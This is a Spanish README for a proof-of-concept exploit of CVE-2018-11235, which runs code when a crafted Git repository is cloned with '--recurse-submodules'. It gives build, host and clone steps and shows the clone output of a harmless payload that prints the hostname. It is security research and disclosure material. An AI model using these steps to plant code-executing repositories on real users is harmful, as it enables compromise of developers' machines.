
Exploit PoC para CVE-2018-11235 que permite RCE en `git clone --recurse-submodules`
GitHub no me permite subir un repositorio que explote la vulnerabilidad (buen punto para ellos), así que tendrás que construirlo tú mismo ejecutando el script build.sh.
Después, sube el repositorio a algún sitio. Cuando lo clones con la
bandera --recurse-submodules, se ejecuta el script malicioso:
$ git clone --recurse-submodules repo dest_dir
Cloning into 'dest_dir'...
done.
Submodule 'Spoon-Knife' (https://github.com/octocat/Spoon-Knife) registered for path 'Spoon-Knife'
Submodule '../../modules/evil' (https://github.com/octocat/Spoon-Knife) registered for path 'evil'
Cloning into '/snip/dest_dir/Spoon-Knife'...
Submodule path 'Spoon-Knife': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Here is your hostname: snip
Submodule path 'evil': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Código derivado del parche de git de @peff (busca
el archivo de prueba t/t7415-submodule-names.sh).
Como tal, este repositorio se publica bajo la Licencia Pública General de GNU versión 2.
Corrección adicional para versiones antiguas de git cortesía de @atorralba (detalles en esta publicación).